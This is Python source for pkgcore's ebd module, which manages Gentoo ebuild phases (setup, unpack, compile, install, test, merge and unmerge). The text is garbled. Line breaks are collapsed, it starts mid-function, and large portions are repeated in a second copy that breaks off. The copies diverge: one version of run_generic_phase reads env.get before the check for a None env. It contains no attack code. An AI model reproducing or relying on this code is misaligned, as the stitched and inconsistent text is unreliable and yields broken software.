# https://github.com/pkgcore/pkgcore/pull/181 if e.errno not in (errno.ENOTEMPTY, errno.EEXIST): raise except EnvironmentError as e: raise format.GenericBuildError( f"clean: Caught exception while cleansing: {e}") from e return True def feat_or_bool(self, name, extra_env=None): if name in self.env: v = bool(self.env[name]) del self.env[name] name = name.lower() if v: self.features.add(name) else: if name in self.features: self.features.remove(name) elif extra_env is not None and name in extra_env: v = bool(extra_env[name]) if v: self.features.add(name.lower()) else: self.features.remove(name.lower()) else: v = name.lower() in self.features return v def __stage_step_callback__(self, stage): try: touch(pjoin(self.builddir, f'.{stage}')) except EnvironmentError: # we really don't care... pass def _reload_state(self): try: self.__set_stage_state__( [x[1:] for x in listdir_files(self.builddir) if x.startswith(".")]) except EnvironmentError as e: if e.errno not in (errno.ENOTDIR, errno.ENOENT): raise class setup_mixin: setup_is_for_src = True def setup(self, setup_phase_override=None): self.setup_logging() additional_commands = {} phase_name = "setup-binpkg" if self.setup_is_for_src: phase_name = "setup" if setup_phase_override is not None: phase_name = setup_phase_override if self.setup_is_for_src: additional_commands["request_inherit"] = partial(inherit_handler, self.eclass_cache) return self._generic_phase( phase_name, False, True, extra_handlers=additional_commands) def run_generic_phase(pkg, phase, env, userpriv, sandbox, fd_pipes=None, extra_handlers=None, failure_allowed=False, logging=None, **kwargs): """ :param phase: phase to execute :param env: environment mapping for the phase :param userpriv: will we drop to :obj:`pkgcore.os_data.portage_uid` and :obj:`pkgcore.os_data.portage_gid` access for this phase? :param sandbox: should this phase be sandboxed? :param fd_pipes: use custom file descriptors for ebd instance :type fd_pipes: mapping between file descriptors :param extra_handlers: extra command handlers :type extra_handlers: mapping from string to callable :param failure_allowed: allow failure without raising error :type failure_allowed: boolean :param logging: None or a filepath to log output to :return: True when the phase has finished execution """ userpriv = userpriv and is_userpriv_capable() sandbox = sandbox and is_sandbox_capable() if env is None: env = expected_ebuild_env(pkg) tmpdir = kwargs.get('tmpdir', env.get('T', None)) ebd = request_ebuild_processor(userpriv=userpriv, sandbox=sandbox, fd_pipes=fd_pipes) # this is a bit of a hack; used until ebd accepts observers that handle # the output redirection on its own. Primary relevance is when # stdout/stderr are pointed at a file; we leave buffering on, just # force the flush for synchronization.
sys.stdout.flush() sys.stderr.flush() try: if not ebd.run_phase(phase, env, tmpdir=tmpdir, sandbox=sandbox, logging=logging, additional_commands=extra_handlers): if not failure_allowed: raise format.GenericBuildError( phase + ": Failed building (False/0 return from handler)") logger.warning(f"executing phase {phase}: execution failed, ignoring") except Exception as e: if isinstance(e, ebd_ipc.IpcError): # notify bash side of IPC error ebd.write(e.ret) if isinstance(e, ebd_ipc.IpcInternalError): # show main exception cause for internal IPC errors ebd.shutdown_processor(force=True) raise e.__cause__ try: ebd.shutdown_processor() except ProcessorError as pe: # catch die errors during shutdown e = pe release_ebuild_processor(ebd) if isinstance(e, ProcessorError): # force verbose die output e._verbosity = 1 raise e elif isinstance(e, IGNORED_EXCEPTIONS + (format.GenericBuildError,)): raise raise format.GenericBuildError( f"Executing phase {phase}: Caught exception: {e}") from e release_ebuild_processor(ebd) return True class install_op(ebd, format.install): """Phase operations and steps for install execution.""" def __init__(self, domain, pkg, observer): format.install.__init__(self, domain, pkg, observer) ebd.__init__( self, pkg, observer=observer, initial_env=self.domain.settings, env_data_source=pkg.environment, clean=False) preinst = pretty_docs( observer.decorate_build_method("preinst")( post_curry(ebd._generic_phase, "preinst", False, False)), "run the preinst phase") postinst = pretty_docs( observer.decorate_build_method("postinst")( post_curry(ebd._generic_phase, "postinst", False, False)), "run the postinst phase") def add_triggers(self, domain_op, engine): self.new_pkg.add_format_triggers(domain_op, self, engine) class uninstall_op(ebd, format.uninstall): """Phase operations and steps for uninstall execution.""" def __init__(self, domain, pkg, observer): format.uninstall.__init__(self, domain, pkg, observer) ebd.__init__( self, pkg, observer=observer, initial_env=self.domain.settings, env_data_source=pkg.environment, clean=False, tmp_offset="unmerge") prerm = pretty_docs( observer.decorate_build_method("prerm")( post_curry(ebd._generic_phase, "prerm", False, False)), "run the prerm phase") postrm = pretty_docs( observer.decorate_build_method("postrm")( post_curry( ebd._generic_phase, "postrm", False, False, failure_allowed=True)), "run the postrm phase") def add_triggers(self, domain_op, engine): self.old_pkg.add_format_triggers(domain_op, self, engine) def finish(self): self.cleanup() return format.uninstall.finish(self) class replace_op(format.replace): """Phase operations and steps for replace execution.""" install_kls = staticmethod(install_op) uninstall_kls = staticmethod(uninstall_op) def __init__(self, domain, old_pkg, new_pkg, observer): super().__init__(domain, old_pkg, new_pkg, observer) self.install_op = install_op(domain, new_pkg, observer) self.install_op.set_is_replacing(old_pkg) self.uninstall_op = uninstall_op(domain, old_pkg, observer) self.uninstall_op.set_is_being_replaced_by(new_pkg) def start(self): self.install_op.start() self.uninstall_op.start() return True prerm = klass.alias_method("uninstall_op.prerm") postrm = klass.alias_method("uninstall_op.postrm") preinst = klass.alias_method("install_op.preinst") postinst = klass.alias_method("install_op.postinst") def finalize(self): ret = self.uninstall_op.finish() ret2 = self.install_op.finish() return (ret and ret2) def add_triggers(self, domain_op, engine): self.uninstall_op.add_triggers(domain_op, engine)
self.install_op.add_triggers(domain_op, engine) class buildable(ebd, setup_mixin, format.build): """Generic build operation.""" # XXX this is unclean- should be handing in strictly what is build # env, rather than dumping domain settings as env. def __init__(self, domain, pkg, verified_files, eclass_cache, observer=None, force_test=False, **kwargs): """ :param pkg: :obj:`pkgcore.ebuild.ebuild_src.package` instance we'll be building :param eclass_cache: the :class:`pkgcore.ebuild.eclass_cache` we'll be using :param verified_files: mapping of fetchables mapped to their disk location """ self._built_class = ebuild_built.fresh_built_package format.build.__init__(self, domain, pkg, verified_files, observer) domain_settings = self.domain.settings ebd.__init__(self, pkg, initial_env=domain_settings, **kwargs) self.env["FILESDIR"] = pjoin(os.path.dirname(pkg.ebuild.path), "files") self.eclass_cache = eclass_cache self.run_test = force_test or self.feat_or_bool("test", domain_settings) self.allow_failed_test = self.feat_or_bool("test-fail-continue", domain_settings) if "test" in self.restrict: self.run_test = False elif not force_test and "test" not in pkg.use: if self.run_test: logger.warning(f"disabling test for {pkg} due to test use flag being disabled") self.run_test = False # XXX minor hack path = self.env["PATH"].split(os.pathsep) for s, default in (("DISTCC", ".distcc"), ("CCACHE", "ccache")): b = (self.feat_or_bool(s, domain_settings) and s not in self.restrict) setattr(self, s.lower(), b) if b: # looks weird I realize, but # pjoin("/foo/bar", "/bar/foo") == "/bar/foo" # and pjoin("/foo/bar", ".asdf") == "/foo/bar/.asdf" self.env.setdefault(s + "_DIR", pjoin(self.domain.tmpdir, default)) # gentoo bug 355283 libdir = self.env.get("ABI") if libdir is not None: libdir = self.env.get(f"LIBDIR_{libdir}") if libdir is not None: libdir = self.env.get(libdir) if libdir is None: libdir = "lib" path.insert(0, f"/usr/{libdir}/{s.lower()}/bin") else: for y in ("_PATH", "_DIR"): if s + y in self.env: del self.env[s+y] self.env["PATH"] = os.pathsep.join(path) # ordering must match appearance order in SRC_URI per PMS self.env["A"] = ' '.join(iter_stable_unique(pkg.distfiles)) if self.eapi.options.has_AA: pkg = self.pkg while hasattr(pkg, '_raw_pkg'): pkg = getattr(pkg, '_raw_pkg') self.env["AA"] = ' '.join(set(iflatten_instance(pkg.distfiles))) if self.eapi.options.has_KV: self.env["KV"] = domain.KV if self.eapi.options.has_merge_type: self.env["MERGE_TYPE"] = "source" if self.eapi.options.has_portdir: self.env["PORTDIR"] = pkg.repo.location self.env["ECLASSDIR"] = eclass_cache.eclassdir if self.setup_is_for_src: # TODO: PORTAGE_ACTUAL_DISTDIR usage by VCS eclasses needs to be # dropped, but it's currently required for repo reuse. self.env['PORTAGE_ACTUAL_DISTDIR'] = domain.distdir self.env['DISTDIR'] = normpath(pjoin(self.builddir, 'distdir')) for k in ('PORTAGE_ACTUAL_DISTDIR', 'DISTDIR'): self.env[k] = os.path.realpath(self.env[k]).rstrip(os.sep) + os.sep def _setup_distfiles(self): # fetch distfiles if not self.verified_files: ops = self.domain.pkg_operations(self.pkg, observer=self.observer) if ops.fetch(): # this breaks encapsulation and should be refactored. Trace # f35f2 and 6561eac for where this was refactored.
self.verified_files = ops.verified_files # symlink them into builddir if self.verified_files: try: if os.path.exists(self.env["DISTDIR"]): if (os.path.isdir(self.env["DISTDIR"]) and not os.path.islink(self.env["DISTDIR"])): shutil.rmtree(self.env["DISTDIR"]) else: os.unlink(self.env["DISTDIR"]) except EnvironmentError as e: raise format.FailedDirectory( self.env["DISTDIR"], f"failed removing existing file/dir/link: {e}") from e if not ensure_dirs(self.env["DISTDIR"], mode=0o770, gid=portage_gid): raise format.FailedDirectory( self.env["DISTDIR"], "failed creating distdir symlink directory") try: for src, dest in [ (k, pjoin(self.env["DISTDIR"], v.filename)) for (k, v) in self.verified_files.items()]: os.symlink(src, dest) except EnvironmentError as e: raise format.GenericBuildError( f"Failed symlinking in distfiles for src {src} -> {dest}: {e}") from e @observer.decorate_build_method("setup") def setup(self): """Execute the setup phase, mapping out to pkg_setup in the ebuild. Necessary dirs are created as required, and build env is initialized at this point. """ if self.distcc: for p in ("", "/lock", "/state"): if not ensure_dirs(pjoin(self.env["DISTCC_DIR"], p), mode=0o2775, gid=portage_gid): raise format.FailedDirectory( pjoin(self.env["DISTCC_DIR"], p), "failed creating needed distcc directory") if self.ccache: # yuck. st = None try: st = os.stat(self.env["CCACHE_DIR"]) except OSError as e: st = None if not ensure_dirs(self.env["CCACHE_DIR"], mode=0o2775, gid=portage_gid): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed creation of ccache dir") from e # XXX this is more than mildly stupid. st = os.stat(self.env["CCACHE_DIR"]) try: if st.st_gid != portage_gid or (st.st_mode & 0o2775) != 0o2775: try: cwd = os.getcwd() except OSError: cwd = "/" with chdir(cwd): # crap. os.chmod(self.env["CCACHE_DIR"], 0o2775) os.chown(self.env["CCACHE_DIR"], -1, portage_gid) if 0 != spawn( ["chgrp", "-R", str(portage_gid), self.env["CCACHE_DIR"]]): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed changing ownership for CCACHE_DIR") if 0 != spawn_bash( "find '%s' -type d -print0 | %s --null chmod 02775" % (self.env["CCACHE_DIR"], xargs)): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed correcting perms for CCACHE_DIR") if 0 != spawn_bash( "find '%s' -type f -print0 | %s --null chmod 0775" % (self.env["CCACHE_DIR"], xargs)): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed correcting perms for CCACHE_DIR") except OSError as e: raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed ensuring perms/group owner for CCACHE_DIR") from e return setup_mixin.setup(self) def configure(self): """Execute the configure phase. Does nothing if the pkg's EAPI is less than 2 (that spec lacks a separated configure phase). """ if "configure" in self.eapi.phases: return self._generic_phase("configure", True, True) return True def prepare(self): """Execute a source preparation phase. Does nothing if the pkg's EAPI is less than 2 """ ret = True if "prepare" in self.eapi.phases: ret = self._generic_phase("prepare", True, True) if (self.eapi.options.user_patches and not os.path.exists(pjoin(self.env['T'], '.user_patches_applied'))): self.observer.error( 'eapply_user (or default) must be called in src_prepare()') raise format.GenericBuildError('missing eapply_user call') return ret def nofetch(self): """Execute the nofetch phase. We need the same prerequisites as setup, so reuse that.
""" ensure_dirs(self.env["T"], mode=0o770, gid=portage_gid, minimal=True) return setup_mixin.setup(self, "nofetch") def unpack(self): """Execute the unpack phase.""" if self.setup_is_for_src: self._setup_distfiles() if self.userpriv: try: os.chown(self.env["WORKDIR"], portage_uid, -1) except OSError as e: raise format.GenericBuildError( "failed forcing %i uid for WORKDIR: %s" % (portage_uid, e)) from e return self._generic_phase("unpack", True, True) compile = pretty_docs( observer.decorate_build_method("compile")( post_curry(ebd._generic_phase, "compile", True, True)), "Run the compile phase (maps to src_compile).") @observer.decorate_build_method("install") def install(self): """Run the install phase (maps to src_install).""" # TODO: replace print() usage with observer print(f">>> Install {self.env["PF"]} into {self.ED!r} category {self.env["CATEGORY"]}") ret = self._generic_phase("install", False, True) print(f">>> Completed installing {self.env["PF"]} into {self.ED!r}") return ret @observer.decorate_build_method("test") def test(self): """Run the test phase (if enabled), maps to src_test.""" if not self.run_test: return True return self._generic_phase( "test", True, True, failure_allowed=self.allow_failed_test) def finalize(self): """Finalize the operation. This yields a built package, but the packages metadata/contents are bound to the workdir. In other words, install the package somewhere prior to executing clean if you intend on installing it. :return: :obj:`pkgcore.ebuild.ebuild_built.package` instance """ factory = ebuild_built.fake_package_factory(self._built_class) return factory.new_package( self.pkg, self.env["D"], pjoin(self.env["T"], "environment")) class binpkg_localize(ebd, setup_mixin, format.build): stage_depends = {"finalize": "setup", "setup": "start"} setup_is_for_src = False def __init__(self, domain, pkg, **kwargs): self._built_class = ebuild_built.package format.build.__init__(self, domain, pkg, {}, observer=kwargs.get("observer", None)) ebd.__init__(self, pkg, **kwargs) if self.eapi.options.has_merge_type: self.env["MERGE_TYPE"] = "binpkg" def finalize(self): return MutatedPkg(self.pkg, {"environment": self.get_env_source()}) class ebuild_operations: _checks = [] def _register_check(checks): """Decorator to register sanity checks that will be run.""" def _wrap_func(func): def wrapped(*args, **kwargs): return func(*args, **kwargs) checks.append(func) return wrapped return _wrap_func def _cmd_implementation_sanity_check(self, domain): """Run all defined sanity checks.""" failures = [] for check in self._checks: if result := check(self, self.pkg, domain=domain): failures.append(result) return failures @_register_check(_checks) def _check_required_use(self, pkg, **kwargs): """Perform REQUIRED_USE verification against a set of USE flags. Note that this assumes the REQUIRED_USE depset has been evaluated against a known set of enabled USE flags and is in collapsed form. 
""" if pkg.eapi.options.has_required_use: if failures := tuple(node for node in pkg.required_use if not node.match(pkg.use)): return errors.RequiredUseError(pkg, failures) @_register_check(_checks) def _check_pkg_pretend(self, pkg, *, domain, **kwargs): """Run pkg_pretend phase.""" # pkg_pretend is not defined or required if 'pretend' not in pkg.mandatory_phases: return commands = None if not pkg.built: commands = { 'request_inherit': partial(inherit_handler, self._eclass_cache), 'has_version': ebd_ipc.Has_Version(self), 'best_version': ebd_ipc.Best_Version(self), } # Use base build tempdir for $T instead of full pkg specific path to # avoid having to create/remove directories -- pkg_pretend isn't # allowed to write to the filesystem anyway. self.env = expected_ebuild_env(pkg) self.env["T"] = domain.pm_tmpdir ebd.set_path_vars(self.env, pkg, domain) # avoid clipping eend() messages self.env["PKGCORE_RC_PREFIX"] = '2' with TemporaryFile() as f: # suppress bash output by default fd_pipes = {1: f.fileno(), 2: f.fileno()} try: run_generic_phase( pkg, "pretend", self.env, tmpdir=None, fd_pipes=fd_pipes, userpriv=True, sandbox=True, extra_handlers=commands) except ProcessorError as e: f.seek(0) output = f.read().decode().strip('\n') return errors.PkgPretendError(pkg, output, e) class src_operations(ebuild_operations, format.build_operations): def __init__(self, domain, pkg, eclass_cache, observer=None): format.build_operations.__init__(self, domain, pkg, observer=observer) self._eclass_cache = eclass_cache def _cmd_implementation_build(self, observer, verified_files, clean=False, force_test=False): return buildable( self.domain, self.pkg, verified_files, self._eclass_cache, observer=observer, clean=clean, force_test=force_test) class misc_operations(ebd): def __init__(self, domain, *args, **kwds): self.domain = domain super().__init__(*args, **kwds) def configure(self, observer=None): return self._generic_phase('config', False, True) def info(self, observer=None): return self._generic_phase('info', True, True) class built_operations(ebuild_operations, format.operations): def __init__(self, domain, pkg, observer=None, initial_env=None): format.operations.__init__(self, domain, pkg, observer=observer) self._initial_env = initial_env self._localized_ebd = None def _cmd_implementation_localize(self, observer, force=False): if not force and getattr(self.pkg, '_is_from_source', False): return self.pkg self._localized_ebd = op = binpkg_localize( self.domain, self.pkg, clean=False, initial_env=self._initial_env, env_data_source=self.pkg.environment, observer=observer) return op.finalize() def _cmd_implementation_cleanup(self, observer, force=False): if not self._localized_ebd: return True return self._localized_ebd.cleanup(force=force) def _cmd_check_support_configure(self): pkg = self.pkg if 'config' not in pkg.mandatory_phases: return False return True def _cmd_implementation_configure(self, observer): misc = misc_operations( self.domain, self.pkg, env_data_source=self.pkg.environment, clean=True) try: misc.start() misc.configure() finally: misc.cleanup() return True
""" EBuild Daemon (ebd), main high level interface to ebuild execution env. Wraps :obj:`pkgcore.ebuild.processor` functionality into a higher level api, for example per phase methods. """ __all__ = ( "ebd", "setup_mixin", "install_op", "uninstall_op", "replace_op", "buildable", "binpkg_localize") import errno import os import re import shutil import sys import time from collections import defaultdict from functools import partial from itertools import chain from tempfile import TemporaryFile from snakeoil import data_source, klass from snakeoil.compatibility import IGNORED_EXCEPTIONS from snakeoil.contexts import chdir from snakeoil.currying import post_curry, pretty_docs from snakeoil.fileutils import touch from snakeoil.osutils import ensure_dirs, listdir_files, normpath, pjoin from snakeoil.process.spawn import is_sandbox_capable, is_userpriv_capable, spawn, spawn_bash from snakeoil.sequences import iflatten_instance, iter_stable_unique from .. import const from ..log import logger from ..operations import format, observer from ..os_data import portage_gid, portage_uid, xargs from ..package.mutated import MutatedPkg from . import ebd_ipc, ebuild_built, errors from .processor import (ProcessorError, chuck_UnhandledCommand, expected_ebuild_env, inherit_handler, release_ebuild_processor, request_ebuild_processor) class ebd: def __init__(self, pkg, initial_env=None, env_data_source=None, observer=None, clean=True, tmp_offset=None): """ :param pkg: :class:`pkgcore.ebuild.ebuild_src.package` instance this env is being setup for :param initial_env: initial environment to use for this ebuild :param env_data_source: a :obj:`snakeoil.data_source.base` instance to restore the environment from- used for restoring the state of an ebuild processing, whether for unmerging, or walking phases during building """ self.pkg = pkg self.eapi = pkg.eapi if not hasattr(self, "observer"): self.observer = observer if not self.eapi.is_supported: raise TypeError(f"package {pkg} uses unsupported EAPI: {str(self.eapi)!r}") if initial_env is not None: # copy. self.env = dict(initial_env) for x in ("USE", "ACCEPT_LICENSE"): self.env.pop(x, None) else: self.env = {} # Drop all USE_EXPAND variables from the exported environment. for u in self.domain.profile.use_expand: self.env.pop(u, None) # Only export USE_EXPAND variables for the package's enabled USE flags. 
d = defaultdict(list) for u in pkg.use: m = self.domain.use_expand_re.match(u) if m: use_expand, value = m.groups() d[use_expand.upper()].append(value) for k, v in d.items(): self.env[k] = ' '.join(sorted(v)) self.bashrc = self.env.pop("bashrc", ()) self.features = set(x.lower() for x in self.domain.features) self.env["FEATURES"] = ' '.join(sorted(self.features)) self.set_path_vars(self.env, self.pkg, self.domain) # internally implemented EAPI specific functions to skip when exporting env self.env["PKGCORE_EAPI_FUNCS"] = ' '.join(self.eapi.bash_funcs) self.env_data_source = env_data_source if (env_data_source is not None and not isinstance(env_data_source, data_source.base)): raise TypeError( "env_data_source must be None, or a pkgcore.data_source.base " f"derivative: {env_data_source.__class__}: {env_data_source}") iuse_effective_regex = f"^({'|'.join(re.escape(x) for x in pkg.iuse_effective)})$" self.env["PKGCORE_IUSE_EFFECTIVE"] = iuse_effective_regex.replace("\\.\\*", ".*") expected_ebuild_env(pkg, self.env, env_source_override=self.env_data_source) self.env["PKGCORE_FINALIZED_RESTRICT"] = ' '.join(str(x) for x in pkg.restrict) self.restrict = pkg.restrict for x in ("sandbox", "userpriv"): setattr(self, x, self.feat_or_bool(x) and not (x in self.restrict)) if self.userpriv and os.getuid() != 0: self.userpriv = False if "PORT_LOGDIR" in self.env: self.logging = pjoin( self.env["PORT_LOGDIR"], "%s:%s:%s.log" % ( pkg.cpvstr, self.__class__.__name__, time.strftime("%Y%m%d-%H%M%S", time.localtime()))) del self.env["PORT_LOGDIR"] else: self.logging = False self.env["PKGCORE_PKG_REPO"] = pkg.source_repository self.env["XARGS"] = xargs # wipe variables listed in ENV_UNSET for supporting EAPIs if self.eapi.options.has_env_unset: for x in self.env.pop('ENV_UNSET', ()): self.env.pop(x, None) # wipe any remaining internal settings from the exported env wipes = [k for k, v in self.env.items() if not isinstance(v, str)] for k in wipes: del self.env[k] self._set_op_vars(tmp_offset) self.clean_at_start = clean self.clean_needed = False # various IPC command support self._ipc_helpers = { # bash helpers 'doins': ebd_ipc.Doins(self), 'dodoc': ebd_ipc.Dodoc(self), 'dohtml': ebd_ipc.Dohtml(self), 'doinfo': ebd_ipc.Doinfo(self), 'dodir': ebd_ipc.Dodir(self), 'doexe': ebd_ipc.Doexe(self), 'dobin': ebd_ipc.Dobin(self), 'dosbin': ebd_ipc.Dosbin(self), 'dolib': ebd_ipc.Dolib(self), 'dolib.so': ebd_ipc.Dolib_so(self), 'dolib.a': ebd_ipc.Dolib_a(self), 'doman': ebd_ipc.Doman(self), 'domo': ebd_ipc.Domo(self), 'dosym': ebd_ipc.Dosym(self), 'dohard': ebd_ipc.Dohard(self), 'keepdir': ebd_ipc.Keepdir(self), # bash functions 'has_version': ebd_ipc.Has_Version(self), 'best_version': ebd_ipc.Best_Version(self), 'unpack': ebd_ipc.Unpack(self), 'eapply': ebd_ipc.Eapply(self), 'eapply_user': ebd_ipc.Eapply_User(self), 'docompress': ebd_ipc.Docompress(self), 'dostrip': ebd_ipc.Dostrip(self), # internals 'filter_env': ebd_ipc.FilterEnv(self), } def start(self): if self.clean_at_start: self.clean_needed = True if not self.cleanup(): return False self.setup_workdir() self._setup_env_data_source() self.clean_needed = True return True @staticmethod def set_path_vars(env, pkg, domain): # XXX: note this is just EAPI 3 and EAPI 7 compatibility; not full prefix, soon.. 
trailing_slash = pkg.eapi.options.trailing_slash env['ROOT'] = domain.root.rstrip(os.sep) + trailing_slash env['PKGCORE_PREFIX_SUPPORT'] = 'false' if pkg.eapi.options.prefix_capable: env['EPREFIX'] = domain.prefix.rstrip(os.sep) env['EROOT'] = ( pjoin(env['ROOT'].rstrip(trailing_slash), env['EPREFIX']) + trailing_slash) env['PKGCORE_PREFIX_SUPPORT'] = 'true' if pkg.eapi.options.has_sysroot: env['SYSROOT'] = env['ROOT'] env['ESYSROOT'] = pjoin(env['SYSROOT'], env['EPREFIX']) env['BROOT'] = env['EPREFIX'] def _set_op_vars(self, tmp_offset): # don't fool with this, without fooling with setup. self.tmpdir = self.domain.pm_tmpdir if tmp_offset: self.tmpdir = pjoin(self.tmpdir, tmp_offset.strip(os.sep)) self.builddir = pjoin(self.tmpdir, self.env["CATEGORY"], self.env["PF"]) for x, y in (("T", "temp"), ("WORKDIR", "work"), ("D", "image"), ("HOME", "homedir"), ("PKGCORE_EMPTYDIR", "empty")): self.env[x] = normpath(pjoin(self.builddir, y)) self.env["D"] += self.eapi.options.trailing_slash self.env["PORTAGE_LOGFILE"] = normpath(pjoin(self.env["T"], "build.log")) # XXX: Note that this is just EAPI 3 support, not yet prefix # full awareness. if self.pkg.eapi.options.prefix_capable: self.env["ED"] = normpath( pjoin(self.env["D"].rstrip(os.sep), self.env["EPREFIX"])) \ + self.eapi.options.trailing_slash # temporary install dir correct for all EAPIs self.ED = self.env.get('ED', self.env['D']) def get_env_source(self): with open(pjoin(self.env["T"], "environment"), "rb") as f: return data_source.bytes_data_source(f.read()) def _setup_env_data_source(self): if not ensure_dirs(self.env["T"], mode=0o770, gid=portage_gid, minimal=True): raise format.FailedDirectory( self.env['T'], "%s doesn't fulfill minimum mode %o and gid %i" % ( self.env['T'], 0o770, portage_gid)) if self.env_data_source is not None: fp = pjoin(self.env["T"], "environment") # load data first (might be a local_source), *then* write # if it's a src_ebuild being installed, trying to do two steps # stomps the local_sources data. data = self.env_data_source.bytes_fileobj().read() with open(fp, "wb") as f: f.write(data) del data def _set_per_phase_env(self, phase, env): self._setup_merge_type(phase, env) # add phase specific helper paths to PATH if they exist ebuild_phase = self.eapi.phases.get(phase, '') if ebuild_phase in self.eapi.helpers: path = chain.from_iterable(( const.PATH_FORCED_PREPEND, self.pkg.eapi.helpers.get('global', ()), self.eapi.helpers[ebuild_phase], os.environ.get('PATH', '').split(os.pathsep), )) env['PATH'] = os.pathsep.join(path) def _setup_merge_type(self, phase, env): # only allowed in pkg_ phases. if (not self.eapi.phases.get(phase, "").startswith("pkg_") and not phase == 'setup-binpkg'): return # note all pkgs have this attribute is_source = getattr(self.pkg, '_is_from_source', True) if self.eapi.options.has_merge_type: env["MERGE_TYPE"] = (is_source and "source") or "binary" else: # we still must export this, just via the portage var name w/ # different values. if we didn't, spec or not, kernel binpkg # merging would be broke. env["EMERGE_FROM"] = (is_source and "ebuild") or "binary" def setup_logging(self): if self.logging and not ensure_dirs(os.path.dirname(self.logging), mode=0o2770, gid=portage_gid): raise format.FailedDirectory( os.path.dirname(self.logging), "PORT_LOGDIR, desired mode 02770 and gid %i" % portage_gid) def setup_workdir(self): # ensure dirs. 
for k in ("HOME", "T", "WORKDIR", "D"): if not ensure_dirs(self.env[k], mode=0o4770, gid=portage_gid, minimal=True): raise format.FailedDirectory( self.env[k], "%s doesn't fulfill minimum mode %o and gid %i" % (k, 0o770, portage_gid)) # XXX hack, just 'til pkgcore controls these directories if (os.stat(self.env[k]).st_mode & 0o2000): logger.warning(f"{self.env[k]} ( {k} ) is setgid") def _generic_phase(self, phase, userpriv, sandbox, extra_handlers={}, failure_allowed=False, suppress_bashrc=False): """ :param phase: phase to execute :param userpriv: will we drop to :obj:`pkgcore.os_data.portage_uid` and :obj:`pkgcore.os_data.portage_gid` access for this phase? :param sandbox: should this phase be sandboxed? """ if phase not in self.pkg.mandatory_phases: # TODO(ferringb): Note the preinst hack; this will be removed once dyn_pkg_preinst # is dead in full (currently it has a selinux labelling and suidctl ran from there) if phase != 'preinst': return True if 'selinux' not in self.features and 'suidctl' not in self.features: return True shutil.rmtree(self.env["PKGCORE_EMPTYDIR"], ignore_errors=True) os.mkdir(self.env["PKGCORE_EMPTYDIR"]) userpriv = self.userpriv and userpriv sandbox = self.sandbox and sandbox self._set_per_phase_env(phase, self.env) extra_handlers = extra_handlers.copy() extra_handlers.update(self._ipc_helpers) if not suppress_bashrc: extra_handlers.setdefault("request_bashrcs", self._request_bashrcs) return run_generic_phase( self.pkg, phase, self.env, userpriv, sandbox, extra_handlers=extra_handlers, failure_allowed=failure_allowed, logging=self.logging) def _request_bashrcs(self, ebd): for source in self.domain.get_package_bashrcs(self.pkg): if source.path is not None: ebd.write(f"path\n{source.path}") elif source.get_data is not None: raise NotImplementedError else: chuck_UnhandledCommand( ebd, "bashrc request: unable to process bashrc " f"due to source '{source}' due to lacking usable get_*") if not ebd.expect("next"): chuck_UnhandledCommand( ebd, "bashrc transfer, didn't receive 'next' response. " "failure?") ebd.write("end_request") def set_is_replacing(self, *pkgs): if self.eapi.options.exports_replacing: self.env['REPLACING_VERSIONS'] = " ".join(pkg.PVR for pkg in pkgs) def set_is_being_replaced_by(self, pkg=None): if self.eapi.options.exports_replacing and pkg is not None: self.env['REPLACED_BY_VERSION'] = pkg.PVR def cleanup(self, disable_observer=False, force=False): if not force: if not self.clean_needed: return True if not os.path.exists(self.builddir): return True if disable_observer: return self.do_cleanup(disable_observer=disable_observer) return self.do_cleanup() @observer.decorate_build_method("cleanup") def do_cleanup(self): try: shutil.rmtree(self.builddir) # try to wipe the cat dir; if not empty, ignore it try: os.rmdir(os.path.dirname(self.builddir)) except EnvironmentError as e: # POSIX specifies either ENOTEMPTY or EEXIST for non-empty dir # in particular, Solaris uses EEXIST in that case. 
# https://github.com/pkgcore/pkgcore/pull/181 if e.errno not in (errno.ENOTEMPTY, errno.EEXIST): raise except EnvironmentError as e: raise format.GenericBuildError( f"clean: Caught exception while cleansing: {e}") from e return True def feat_or_bool(self, name, extra_env=None): if name in self.env: v = bool(self.env[name]) del self.env[name] name = name.lower() if v: self.features.add(name) else: if name in self.features: self.features.remove(name) elif extra_env is not None and name in extra_env: v = bool(extra_env[name]) if v: self.features.add(name.lower()) else: self.features.remove(name.lower()) else: v = name.lower() in self.features return v def __stage_step_callback__(self, stage): try: touch(pjoin(self.builddir, f'.{stage}')) except EnvironmentError: # we really don't care... pass def _reload_state(self): try: self.__set_stage_state__( [x[1:] for x in listdir_files(self.builddir) if x.startswith(".")]) except EnvironmentError as e: if e.errno not in (errno.ENOTDIR, errno.ENOENT): raise class setup_mixin: setup_is_for_src = True def setup(self, setup_phase_override=None): self.setup_logging() additional_commands = {} phase_name = "setup-binpkg" if self.setup_is_for_src: phase_name = "setup" if setup_phase_override is not None: phase_name = setup_phase_override if self.setup_is_for_src: additional_commands["request_inherit"] = partial(inherit_handler, self.eclass_cache) return self._generic_phase( phase_name, False, True, extra_handlers=additional_commands) def run_generic_phase(pkg, phase, env, userpriv, sandbox, fd_pipes=None, extra_handlers=None, failure_allowed=False, logging=None, **kwargs): """ :param phase: phase to execute :param env: environment mapping for the phase :param userpriv: will we drop to :obj:`pkgcore.os_data.portage_uid` and :obj:`pkgcore.os_data.portage_gid` access for this phase? :param sandbox: should this phase be sandboxed? :param fd_pipes: use custom file descriptors for ebd instance :type fd_pipes: mapping between file descriptors :param extra_handlers: extra command handlers :type extra_handlers: mapping from string to callable :param failure_allowed: allow failure without raising error :type failure_allowed: boolean :param logging: None or a filepath to log output to :return: True when the phase has finished execution """ userpriv = userpriv and is_userpriv_capable() sandbox = sandbox and is_sandbox_capable() tmpdir = kwargs.get('tmpdir', env.get('T', None)) if env is None: env = expected_ebuild_env(pkg) ebd = request_ebuild_processor(userpriv=userpriv, sandbox=sandbox, fd_pipes=fd_pipes) # this is a bit of a hack; used until ebd accepts observers that handle # the output redirection on its own. Primary relevance is when # stdout/stderr are pointed at a file; we leave buffering on, just # force the flush for synchronization. 
